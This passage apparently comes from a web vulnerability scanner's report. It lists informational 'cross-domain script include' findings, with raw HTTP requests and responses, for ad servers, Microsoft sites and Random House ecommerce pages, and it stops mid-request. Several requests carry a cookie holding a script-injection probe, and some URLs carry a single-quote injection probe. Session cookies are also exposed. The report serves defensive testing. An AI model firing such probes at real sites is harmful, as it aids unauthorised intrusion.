GET /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5468
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:41:26 GMT
Expires: Tue, 26 Apr 2011 18:41:26 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 19:54:08 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://amch.questionmarket.com/adscgen/st.php?survey_num=851211&site=60069804&code=39864914&randnum=6031698"></script>
...[SNIP]...

20.3. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=170000936&PG=INVPFO&ASID=aa5c7a3756ac4af8a29da842c2cd5fd1&destination=;ord=170000936? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:45:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sat Feb 12 01:28:37 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40453887&c5=62431291&c6=&"></script>
...[SNIP]...

20.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6448
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:39:22 GMT
Expires: Tue, 26 Apr 2011 18:39:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 28 16:36:41 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=&"></script>
...[SNIP]...

20.5. http://advertising.microsoft.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home?s_cid=us_msn_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; 18987408-VID=16601209214853; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649894761:ss=1303649859266

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:44:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_msn_footer; path=/
Set-Cookie: MarketToggleClosedTest=; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Set-Cookie: MarketToggleRenderMethod=STATICADVERTISING.MICROSOFT.COM; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:44:44 GMT
Content-Length: 70966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<![endif]--><script src="//ajax.aspnetcdn.com/ajax/jquery/jquery-1.5.2.min.js" type="text/javascript"></script>
...[SNIP]...

20.6. http://analytics.live.com/Sync.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Host: analytics.live.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:35:42 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
...[SNIP]...

20.7. http://blog.widgetbox.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.widgetbox.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: blog.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; km_vs=1; km_lv=1303854422; km_uq=; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.6.10.1303854385

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=6FF6422B75DF69D5F6D78A9CC3151614.web125; Path=/; HttpOnly
X-ServedBy: web125
Set-Cookie: ss_lastvisit=1303854731302; Expires=Fri, 23-Apr-2021 21:52:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Apr 2011 21:52:10 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=2097260736.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 44235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<!-- End Heading -->

<script src="http://platform.twitter.com/anywhere.js?id=2Lr9s2t2KSyonvNkC2XYA&amp;v=1" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

20.8. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl?c=1142057&sc=4&whence=&n=1&ext=F&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=1142057&sc=4&whence=&n=1&ext=F
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; gc=1142057_clear

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:25 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256033290:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=915
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

20.9. http://ecommerce.randomhouse.com/cart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cart.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=99AF3E637ECB1D69552DA7E98D58C60F.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19400


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.10. https://ecommerce.randomhouse.com//account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //account.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:49:24 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17091


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.11. https://ecommerce.randomhouse.com//create-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //create-address.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //create-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 24044


<!-- createAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.12. https://ecommerce.randomhouse.com//email-password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //email-password.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //email-password.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:11 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 18043


<!-- updateEmailPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.13. https://ecommerce.randomhouse.com//select-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //select-address.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //select-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16341


<!-- selectAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.14. https://ecommerce.randomhouse.com//view-orders.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //view-orders.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //view-orders.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:12 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 14600


<!-- orderHistory.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.15. https://ecommerce.randomhouse.com/account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=30BCBB9743BBB87336047B037BF512BF.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16859


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.16. https://ecommerce.randomhouse.com/create-account-submit.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /create-account-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
